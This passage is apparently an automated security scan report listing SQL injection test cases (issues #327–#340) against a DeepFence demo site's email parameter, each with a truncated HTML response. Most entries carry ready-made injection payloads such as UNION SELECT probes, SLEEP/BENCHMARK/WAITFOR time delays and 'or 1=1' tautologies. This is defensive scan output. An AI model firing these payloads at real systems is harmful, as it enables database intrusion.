Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11-\n-\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #327\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #328Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #329\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io waitfor delay '00:00:05'#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #330\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin\"or 1=1 or \"\"=\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #331\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io admin\") or (\"1\"=\"1\"/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #332\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #333\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin' or '1'='1'#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #334\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 1=0--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #335\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #336Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #337\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io%\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #338\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #339\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #340\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io +benchmark(3200,SHA1(1))+'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script 